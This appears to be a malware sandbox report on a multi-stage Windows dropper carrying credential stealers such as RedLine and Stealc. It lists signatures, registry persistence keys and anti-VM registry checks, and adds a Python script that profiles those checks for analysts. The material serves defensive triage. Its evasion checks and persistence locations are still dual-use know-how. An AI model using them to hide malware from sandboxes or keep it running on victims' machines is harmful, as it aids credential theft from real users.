Analysis Overview
SHA256
32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9
Threat Level: Known bad
The file 32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9 was found to be: Known bad.
Malicious Activity Summary
Xworm
StormKitty payload
Detects ZharkBot payload
Stealc
RedLine payload
StormKitty
Lumma Stealer, LummaC
CryptBot
ZharkBot
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine
Amadey
Detect Xworm Payload
Contains code to disable Windows Defender
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Indirect Command Execution
Loads dropped DLL
Drops startup file
Unsecured Credentials: Credentials In Files
Checks computer location settings
Checks BIOS information in registry
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Identifies Wine through registry keys
Executes dropped EXE
Drops Chrome extension
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Indicator Removal: File Deletion
Checks installed software on the system
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-09 05:02
Signatures
Unsigned PE
(1 match; no indicator details recorded)
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-09 05:02
Reported
2024-09-09 05:07
Platform
win10-20240404-en
Max time kernel
299s
Max time network
300s
Command Line
Signatures
Amadey
Contains code to disable Windows Defender
(1 match; no indicator details recorded)
CryptBot
Detect Xworm Payload
(2 matches; no indicator details recorded)
Detects ZharkBot payload
(1 match; no indicator details recorded)
Lumma Stealer, LummaC
RedLine
RedLine payload
(5 matches; no indicator details recorded)
Stealc
StormKitty
StormKitty payload
(1 match; no indicator details recorded)
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
ZharkBot
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
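The three tables above, together with the CPU table at the end of this report, show the dropper chain (the submitted sample, axplong.exe, a6035a70b6.exe) reading the registry locations that give a VirtualBox guest away: the `VBOX__` OEM id under `HARDWARE\ACPI\DSDT`, the `SystemBiosVersion`/`VideoBiosVersion` strings, and the `Software\Wine` key. The report records which keys were read but not what the values were compared against. The following script is an added example and is not part of the sandbox's output or of the malware: it profiles rows in this report's table format per process, and separately estimates which of these checks a given analysis host would trip. The `HYPERVISOR_MARKERS` list and the extension of the ACPI check to the FADT and RSDT tables (which VirtualBox tags with the same OEM id) are assumptions, not observations from this run.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Registry paths read in the behavioral2 run, mapped to the evasion technique they
# indicate. The VirtualBox check is generalised to the FADT and RSDT tables, which
# VirtualBox tags with the same "VBOX__" OEM id (the report only shows DSDT).
EVASION_PATTERNS = {
    "vm:virtualbox-acpi": re.compile(r"\\HARDWARE\\ACPI\\(?:DSDT|FADT|RSDT)\\VBOX__", re.I),
    "vm:bios-version": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(?:System|Video)BiosVersion$", re.I),
    "emulation:wine": re.compile(r"\\Software\\Wine$", re.I),
    "hw:cpu-name": re.compile(r"\\CentralProcessor\\0(?:\\ProcessorNameString)?$", re.I),
}

# One report row: | Description | Indicator | Process | Target |
ROW = re.compile(r"^\|\s*(?P<action>[^|]*?)\s*\|\s*(?P<key>[^|]*?)\s*\|\s*(?P<proc>[^|]*?)\s*\|")


def profile_registry_evasion(rows):
    """Map each process (basename) to the evasion techniques it used and how often."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in rows:
        m = ROW.match(line.strip())
        if not m or not m["action"].startswith("Key"):
            continue  # table header, or a row that is not a registry action
        proc = PureWindowsPath(m["proc"]).name
        for tech, pattern in EVASION_PATTERNS.items():
            if pattern.search(m["key"]):
                hits[proc][tech] += 1
    return {proc: dict(techs) for proc, techs in hits.items()}


# What a BIOS-string check is assumed to look for. The report shows the values being
# read, not the comparison, so this list is an assumption rather than sample data.
HYPERVISOR_MARKERS = ("VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "BOCHS", "XEN", "HYPER-V", "VIRTUAL")


def sandbox_exposure(system_bios, video_bios, acpi_table_oem_ids, wine_key_present=False):
    """Return the observed checks that would succeed on a host exposing these values."""
    fired = set()
    if any(oem.upper().startswith("VBOX") for oem in acpi_table_oem_ids):
        fired.add("vm:virtualbox-acpi")
    if any(mark in s.upper() for s in (system_bios, video_bios) for mark in HYPERVISOR_MARKERS):
        fired.add("vm:bios-version")
    if wine_key_present:
        fired.add("emulation:wine")
    return fired


# Rows copied from the anti-VM, BIOS, Wine and CPU tables of this report.
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
""".strip().splitlines()

if __name__ == "__main__":
    for proc, techs in profile_registry_evasion(SAMPLE_ROWS).items():
        print(f"{proc}: {techs}")
    # Constructed VirtualBox-style values, to show why a stock VirtualBox guest is detected.
    print(sandbox_exposure("VBOX   - 1", "Oracle VM VirtualBox VGA BIOS", ["VBOX__"]))
```

The per-process profile is the useful output when triaging a multi-stage drop like this one: it separates the loader that performs the checks (axplong.exe, eight reads of the VirtualBox key) from payloads that do not. `sandbox_exposure` is the other direction, a quick way to confirm that an analysis VM which still reports VirtualBox BIOS strings or keeps the `VBOX__` ACPI keys will make this family bail out before the stealers run.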
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
(row repeated 17 times: 17 separate forfiles.exe invocations)
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe" | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\tEZYwqVfuQYU2\wSfRwKR.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\TjUkTRKCSiJkC\yVlcrdN.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\TjUkTRKCSiJkC\mPdOlvG.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\FDxSmxakU\NbuCkm.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\tEZYwqVfuQYU2\MNVbQukCVkHmG.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\sOPBqcf.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\QSBDBQxFkAUn\klYSTNF.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
